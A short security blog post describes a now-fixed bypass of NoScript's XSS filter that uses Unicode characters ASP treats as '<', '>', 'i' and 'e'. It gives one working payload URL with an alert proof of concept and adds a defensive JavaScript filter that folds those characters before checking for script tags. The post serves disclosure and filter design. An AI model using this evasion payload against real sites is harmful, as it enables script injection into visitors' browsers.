NoScript New Bypass Method by Unicode in ASP


NoScript v2.0.2.3 does not have this problem anymore. Thanks to its author. As I’d told Giorgio, all the problems will be reported to him first.

Woohoo! You/We/They/or whatever! can still use Unicode in some places!

NoScript cannot detect special Unicode characters that have a meaning in ASP:


http://Example.com/VulnFile.asp?DangInput=%u2329scr%u0131pt%u232A%u212Fval('alert'%2b'("NoScript Bypass in ASP!\\nBy Soroush Dalili")')%u2329/scr%u0131pt%u232A

In this example I selected the characters from http://rishida.net/scripts/uniview/uniview.php. For instance:
%u2329 = <
%u0131 = i
%u232A = >
%u212F = e
That is, from Microsoft's point of view! Therefore, IE8's XSS prevention can detect this encoding and NoScript cannot.
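
A filter closes this gap by looking at the parameter the way the server will see it. The block below is an added example, not code from the original post or from NoScript. It decodes the `%uXXXX` form used in the URL above, folds the four code points listed here to their ASCII equivalents, and then runs the tag check. All function names, the table name and the sample string are hypothetical, and the table holds only the four mappings from this post.

```javascript
// Added example: fold the post's look-alike code points before filtering.
// BEST_FIT lists only the four mappings given in the post; a real filter
// would need the server's full mapping table (assumption: it is known).
const BEST_FIT = new Map([
  [0x2329, '<'], // LEFT-POINTING ANGLE BRACKET
  [0x232a, '>'], // RIGHT-POINTING ANGLE BRACKET
  [0x0131, 'i'], // LATIN SMALL LETTER DOTLESS I
  [0x212f, 'e'], // SCRIPT SMALL E
]);

// Decode %uXXXX and %XX escapes in a single pass, so a decoded '%' is
// never re-read as the start of another escape (no double decoding).
function decodeEscapes(value) {
  return value.replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi,
    (_, wide, narrow) => String.fromCharCode(parseInt(wide || narrow, 16)));
}

// Replace each mapped code point with the ASCII character the server sees.
// Unicode NFKC normalization would not do this for U+2329, U+232A or U+0131.
function foldBestFit(text) {
  return Array.from(text, ch => BEST_FIT.get(ch.codePointAt(0)) || ch).join('');
}

const SCRIPT_TAG = /<\s*\/?\s*script\b/i;

// Report whether a script tag is visible before and after folding.
function inspectParam(rawValue) {
  const decoded = decodeEscapes(rawValue);
  const folded = foldBestFit(decoded);
  return {
    decoded,
    folded,
    hitBeforeFold: SCRIPT_TAG.test(decoded),
    hitAfterFold: SCRIPT_TAG.test(folded),
  };
}

// Constructed, harmless sample built from the same four code points.
const SAMPLE = '%u2329scr%u0131pt%u232Anot%u212F%u2329/scr%u0131pt%u232A';
console.log(inspectParam(SAMPLE));
```

A check that only inspects `decoded` reports no tag for the sample, while the same check on `folded` does, which is the difference between the two filters compared above.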